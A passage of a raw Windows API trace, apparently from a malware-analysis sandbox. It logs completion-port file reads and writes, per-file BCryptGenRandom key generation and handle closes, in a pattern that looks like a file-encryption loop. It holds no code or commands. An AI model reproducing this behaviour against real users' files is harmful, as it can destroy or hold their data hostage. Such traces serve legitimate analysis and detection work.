| out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0103.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.307] CloseHandle (hObject=0x13c8) returned 1 [0103.313] free (_Block=0x3d70048) [0103.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.324] CloseHandle (hObject=0x13b4) returned 1 [0103.325] free (_Block=0x3e70008) [0103.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.341] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1df4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.360] ReadFile (in: hFile=0x13b4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1e7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0103.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0103.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0103.387] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.387] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.387] free (_Block=0x77d800) [0103.387] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.387] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.388] free (_Block=0x2071818) [0103.388] free (_Block=0x2071928) [0103.388] free (_Block=0x77d908) [0103.388] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.390] WriteFile (in: hFile=0xf00, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0103.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.396] CloseHandle (hObject=0x13c0) returned 1 [0103.400] free (_Block=0x1ff1e60) [0103.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.422] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0103.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0103.425] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.425] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.425] free (_Block=0x77d800) [0103.425] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.425] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.425] free (_Block=0x2071818) [0103.425] free (_Block=0x2071928) [0103.425] free (_Block=0x77d908) [0103.425] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0103.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0103.434] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.434] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.434] free (_Block=0x77d800) [0103.435] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.435] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.435] free (_Block=0x2071818) [0103.435] free (_Block=0x2071928) [0103.435] free (_Block=0x77d908) [0103.435] WriteFile (in: hFile=0x2f8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0103.436] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.449] CloseHandle (hObject=0x81c) returned 1 [0103.453] free (_Block=0x1ff1e60) [0103.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.466] CloseHandle (hObject=0x2f8) returned 1 [0103.467] free (_Block=0x3d70048) [0103.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.479] ReadFile (in: hFile=0x304, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xc9c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0103.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.505] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x12c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.532] ReadFile (in: hFile=0x814, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x138c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0103.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.581] CloseHandle (hObject=0x304) returned 1 [0103.581] free (_Block=0x3e70008) [0103.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0103.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.616] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0103.616] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.616] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.616] free (_Block=0x77d800) [0103.616] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0103.616] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0103.617] free (_Block=0x1fa4848) [0103.617] free (_Block=0x2071818) [0103.617] free (_Block=0x77d908) [0103.617] WriteFile (in: hFile=0x81c, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0103.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.618] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0103.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0103.620] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.620] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.620] free (_Block=0x77d800) [0103.620] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0103.620] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0103.620] free (_Block=0x1fa4848) [0103.620] free (_Block=0x2071818) [0103.620] free (_Block=0x77d908) [0103.620] WriteFile (in: hFile=0x304, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.625] WriteFile (in: hFile=0x81c, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0103.625] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.636] WriteFile (in: hFile=0x304, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.636] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.674] ReadFile (in: hFile=0x304, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x57f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.690] CloseHandle (hObject=0x304) returned 1 [0103.692] free (_Block=0x1ff1e60) [0103.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0103.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0103.694] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.694] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.694] free (_Block=0x77d800) [0103.694] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0103.694] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0103.694] free (_Block=0x1fa4848) [0103.694] free (_Block=0x2071818) [0103.694] free (_Block=0x77d908) [0103.694] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0106.598] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1eb6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0106.606] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0106.621] WriteFile (in: hFile=0x3ac, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0106.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0106.640] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0106.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0106.655] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x27a2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0106.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0106.678] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0106.699] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x5ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0106.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0106.706] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xf92, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0106.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0106.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0106.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0106.718] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.718] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.718] free (_Block=0x77d800) [0106.718] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.718] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.719] free (_Block=0x1fa4848) [0106.719] free (_Block=0x2071818) [0106.719] free (_Block=0x77d908) [0106.719] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0108.312] WriteFile (in: hFile=0x3ac, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0108.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.478] CloseHandle (hObject=0x3bc) returned 1 [0109.479] free (_Block=0x3ef0008) [0109.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.564] CloseHandle (hObject=0x2f4) returned 1 [0109.569] free (_Block=0x1ff1e60) [0109.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.582] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x15d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.596] CloseHandle (hObject=0x13c0) returned 1 [0109.599] free (_Block=0x3ef0008) [0109.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.609] CloseHandle (hObject=0x3bc) returned 1 [0109.610] free (_Block=0x3d70048) [0109.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.622] CloseHandle (hObject=0x3ac) returned 1 [0109.625] free (_Block=0x3db00b8) [0109.625] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0109.628] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, 